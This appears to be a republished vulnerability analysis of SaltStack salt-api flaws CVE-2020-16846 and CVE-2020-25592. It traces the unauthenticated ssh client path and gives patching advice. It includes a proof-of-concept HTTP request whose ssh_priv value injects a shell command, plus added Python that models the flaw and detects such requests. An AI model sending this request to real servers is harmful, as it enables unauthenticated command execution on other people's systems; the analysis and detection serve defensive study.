
Analysis of the SaltStack unauthorized access and command execution vulnerabilities CVE-2020-16846 and CVE-2020-25592

2025-01-23 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)05/31 Report--

Many readers are unsure how to analyze the SaltStack unauthorized access and command execution vulnerabilities CVE-2020-16846 and CVE-2020-25592, so this article summarizes the cause of the problem and its remediation. I hope it helps you resolve it.

1. Vulnerability background

SaltStack is a distributed operations and maintenance system that is widely used in Internet-facing deployments. It has two main functions: a configuration management system, which keeps remote nodes in a predefined state (for example, ensuring that specific packages are installed and specific services are running), and a distributed remote execution system, which runs commands and queries data on remote nodes, either individually or selected by arbitrary criteria.

On November 4, 2020, SaltStack published a security advisory. Chained together, CVE-2020-16846 and CVE-2020-25592 allow arbitrary command execution through the salt-api interface without authorization: CVE-2020-25592 lets any user call the SSH client module without authentication, and CVE-2020-16846 lets that user execute arbitrary commands. Although salt-api is not enabled by default, the great majority of SaltStack users do enable it, so the risk is high.

Vulnerability numbers: CVE-2020-16846, CVE-2020-25592

Affected versions:

3002
3001.1, 3001.2
3000.3, 3000.4
2019.2.5, 2019.2.6
2018.3.5
2017.7.4, 2017.7.8
2016.11.3, 2016.11.6, 2016.11.10
2016.3.4, 2016.3.6, 2016.3.8
2015.8.10, 2015.8.13

2. Vulnerability analysis and POC

As of November 11, 2020, the patch had not yet been merged into the master branch on GitHub, so the vulnerable code can be obtained directly from SaltStack's official GitHub repository. The master branch at the time of writing is version 3002 and the analysis system is a Mac. The code differs considerably between version lines, so each line needs to be analyzed separately.

Salt Version:
           Salt: 3002-56-g3e269eda82

Dependency Versions:
           cffi: 1.14.3
       cherrypy: unknown
       dateutil: Not Installed
      docker-py: Not Installed
          gitdb: 4.0.5
      gitpython: 3.1.11
         Jinja2: 2.11.2
        libgit2: Not Installed
       M2Crypto: Not Installed
           Mako: 1.0.7
        msgpack: 1.0.0
   msgpack-pure: Not Installed
   mysql-python: Not Installed
      pycparser: 2.19
       pycrypto: Not Installed
   pycryptodome: 3.9.9
         pygit2: Not Installed
         Python: 3.8.2 (default Sep 24 2020 19:37:08)
   python-gnupg: Not Installed
         PyYAML: 5.3.1
          PyZMQ: 19.0.2
          smmap: 3.0.4
        timelib: Not Installed
        Tornado: 4.5.3
            ZMQ: 4.3.2

System Versions:
           dist: darwin 19.6.0
         locale: utf-8
        machine: x86_64
        release: 19.6.0
         System: Darwin
        version: 10.15.6 x86_64

The salt-api REST interface uses the CherryPy framework by default. From the implementation of the run interface, we can see that methods of the NetapiClient class are dispatched dynamically according to the client parameter.

The following convention is used to specify code locations in this article: FileLocation:Classname.method()

salt/netapi/__init__.py:NetapiClient.run()

The parameter low is an external, request-supplied parameter, and the salt.utils.args.format_call method maps it onto **kwargs.

When the client parameter is ssh, salt/netapi/__init__.py:NetapiClient.ssh() is called dynamically, and that method performs no authentication at all.

salt/netapi/__init__.py:NetapiClient.ssh()

Following the call further, the path is:

salt/netapi/__init__.py:NetapiClient.ssh() ⇒ salt/client/ssh/client.py:SSHClient.cmd_sync() ⇒ salt/client/ssh/client.py:SSHClient._prep_ssh()

salt/client/ssh/client.py:SSHClient._prep_ssh()

In this method, the externally controllable kwargs are merged into the opts variable (which can be thought of as the SaltStack system's environment configuration), and that variable is then used to initialize salt.client.ssh.SSH.

salt/client/ssh/__init__.py:SSH.__init__()

The value of priv is taken from the opts variable, and the salt.client.ssh.shell.gen_key() method is called with it.

salt/client/ssh/shell.py:gen_key()

In this method, the command line is assembled by string concatenation and then executed through a shell. If the input value is of the form | COMMAND > {} #, COMMAND is executed.
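To make the data flow above concrete, here is an added example (my code, not SaltStack's, and simplified from the page's description): a toy NetapiClient with the dynamic client dispatch, an ssh handler that merges request kwargs into opts, and a gen_key that splices the key path into a shell string, beside a hardened variant with an authentication gate, a client allow-list, protected opts and an argv-style command. Neither variant executes anything: both return the ssh-keygen command they would run, so the difference can be inspected offline. The opts values, the token store and the request dictionaries are constructed.

```python
"""Toy model of salt-api run() -> NetapiClient.ssh() -> gen_key().
Added example, not SaltStack's code. Commands are returned, never executed."""
import os

# Constructed stand-in for the master's opts; the real opts dict is far larger.
MASTER_OPTS = {
    "pki_dir": "/etc/salt/pki/master",
    "ssh_priv": "/etc/salt/pki/master/ssh/salt-ssh.rsa",
}


def gen_key_cmd_unsafe(path):
    """Vulnerable pattern (CVE-2020-16846): the path is interpolated into one
    string that would be handed to a shell, so '|' and ';' in it become syntax."""
    return 'ssh-keygen -P "" -f {} -t rsa -q'.format(path)


def gen_key_cmd_safe(path, pki_dir):
    """Hardened pattern: an argv list keeps the path a single argument, and the
    path must resolve inside pki_dir so a caller cannot point it elsewhere."""
    real = os.path.realpath(path)
    if not real.startswith(os.path.realpath(pki_dir) + os.sep):
        raise ValueError("key path must be under pki_dir")
    return ["ssh-keygen", "-P", "", "-f", real, "-t", "rsa", "-q"]


class VulnerableNetapiClient:
    """Mirrors the flawed flow: any attribute named by ``client`` is called,
    the ssh handler checks no credentials, and request kwargs overwrite opts."""

    def __init__(self, opts):
        self.opts = dict(opts)

    def run(self, low):
        low = dict(low)
        client = low.pop("client")
        # No allow-list and no auth check (CVE-2020-25592 pattern).
        return getattr(self, client)(**low)

    def ssh(self, **kwargs):
        opts = dict(self.opts)
        opts.update(kwargs)  # request-controlled ssh_priv wins over the master's
        return gen_key_cmd_unsafe(opts["ssh_priv"])


class HardenedNetapiClient:
    """Every client goes through the same auth gate, and master-side settings
    cannot be overridden from the request."""
    ALLOWED_CLIENTS = {"ssh"}  # the real API also has local/runner/wheel
    PROTECTED_OPTS = {"ssh_priv", "pki_dir"}

    def __init__(self, opts, valid_tokens):
        self.opts = dict(opts)
        self._valid_tokens = set(valid_tokens)  # constructed token store

    def run(self, low):
        low = dict(low)
        client = low.pop("client", None)
        if client not in self.ALLOWED_CLIENTS:
            raise PermissionError("unknown client %r" % client)
        if low.pop("token", None) not in self._valid_tokens:
            raise PermissionError("authentication required")
        return getattr(self, client)(**low)

    def ssh(self, **kwargs):
        clash = self.PROTECTED_OPTS & set(kwargs)
        if clash:
            raise ValueError("request may not override %s" % sorted(clash))
        return gen_key_cmd_safe(self.opts["ssh_priv"], self.opts["pki_dir"])


def attempt(client, low):
    """Run a request and report ('ok', result) or (exception name, message)."""
    try:
        return "ok", client.run(low)
    except (PermissionError, ValueError) as exc:
        return type(exc).__name__, str(exc)


if __name__ == "__main__":
    # Constructed request in the shape of the page's POC; nothing is executed.
    low = {"client": "ssh", "tgt": "*", "fun": "a", "ssh_priv": "aaa | echo injected ;"}
    print(attempt(VulnerableNetapiClient(MASTER_OPTS), low))
    print(attempt(HardenedNetapiClient(MASTER_OPTS, ["t0k3n"]), low))
    print(attempt(HardenedNetapiClient(MASTER_OPTS, ["t0k3n"]), {"client": "ssh", "token": "t0k3n"}))
```

The vulnerable client returns a string in which the request-supplied value has become shell syntax; the hardened client refuses the same request twice over (no valid token, and a protected option supplied by the caller), and when it does build a command the path is a single argv element that must live under pki_dir.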

POC

From the above analysis, the POC is as follows:

POST /run HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/x-yaml
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 109

token=12312&client=ssh&tgt=*&fun=a&roster=whip1ash&ssh_priv=aaa | open%20/System/Applications/Calculator.app%3b
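A request of this shape is also a detection opportunity. The following added example (my code, not the page's or SaltStack's) parses raw salt-api HTTP requests and flags the markers a defender can look for: client=ssh, caller-supplied parameters that belong to the master's configuration (ssh_priv, priv, roster, pki_dir), and shell metacharacters inside the key path. The two requests in SAMPLE_REQUESTS are constructed; the parameter names come from the POC and the analysis above.

```python
"""Flag salt-api requests matching the CVE-2020-16846 / CVE-2020-25592 pattern.
Added example, not SaltStack code; the sample requests are constructed."""
import re
from urllib.parse import parse_qs

# Master-side settings that a legitimate API caller has no reason to supply.
OVERRIDE_KEYS = {"ssh_priv", "priv", "roster", "pki_dir"}
# Characters that become syntax once a value is spliced into a shell command.
SHELL_META = re.compile(r"[|;&`$<>\n]")


def parse_raw_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def analyze_request(raw):
    """Return finding strings for one raw request (empty list = nothing suspicious)."""
    method, path, headers, body = parse_raw_request(raw)
    if method != "POST" or "x-www-form-urlencoded" not in headers.get("content-type", ""):
        return []
    # parse_qs percent-decodes, so %7C and %3B are seen as '|' and ';'.
    params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    findings = []
    if params.get("client") == "ssh":
        findings.append("client=ssh on %s: SSH client reached through salt-api "
                        "(unauthenticated on unpatched versions, CVE-2020-25592)" % path)
    for key in sorted(OVERRIDE_KEYS & set(params)):
        findings.append("master setting supplied by caller: %s=%r" % (key, params[key]))
    for key in ("ssh_priv", "priv"):
        if key in params and SHELL_META.search(params[key]):
            findings.append("shell metacharacters in %s (CVE-2020-16846 injection pattern): %r"
                            % (key, params[key]))
    return findings


def scan(requests):
    """Map request index -> findings, keeping only flagged requests."""
    return {i: f for i, f in enumerate(map(analyze_request, requests)) if f}


# Constructed sample traffic: one ordinary local client call, one POC-shaped request.
SAMPLE_REQUESTS = [
    "POST /run HTTP/1.1\r\nHost: 127.0.0.1:8000\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "client=local&tgt=*&fun=test.ping&username=ops&password=REDACTED&eauth=pam",
    "POST /run HTTP/1.1\r\nHost: 127.0.0.1:8000\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "token=12312&client=ssh&tgt=*&fun=a&roster=r1&ssh_priv=aaa%20%7C%20echo%20marker%20%3B",
]

if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_REQUESTS).items():
        print("request", idx)
        for finding in findings:
            print("  -", finding)
```

The benign request produces no findings; the POC-shaped one produces four, one per marker. In practice the same checks can run over salt-api's CherryPy access log or a proxy capture in front of port 8000, and a client=ssh call without a successful /login is worth alerting on by itself, independent of the payload.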

About the reproduction environment

1. Reproducing on a Mac requires manually creating the log and configuration directories, and the relevant configuration files must be written by hand.

2. The official Docker image does not contain an SSH client by default, so salt-api hangs when the POC is executed. In testing, version 3002 restarts automatically, while versions 3000.4 and 2019.2.5 do not. Therefore, when salt-api hangs, first check whether the ssh binary is available on the machine.

3. Security recommendations

1. Patch as soon as possible. Since the official upgrade packages have not yet been released, the fix must be applied manually; refer to the official security advisory and patch.

2. If you do not need salt-api, disable it.

After reading the above, do you know how to analyze the SaltStack unauthorized access and command execution vulnerabilities CVE-2020-16846 and CVE-2020-25592? If you want to learn more, follow the industry information channel. Thank you for reading!
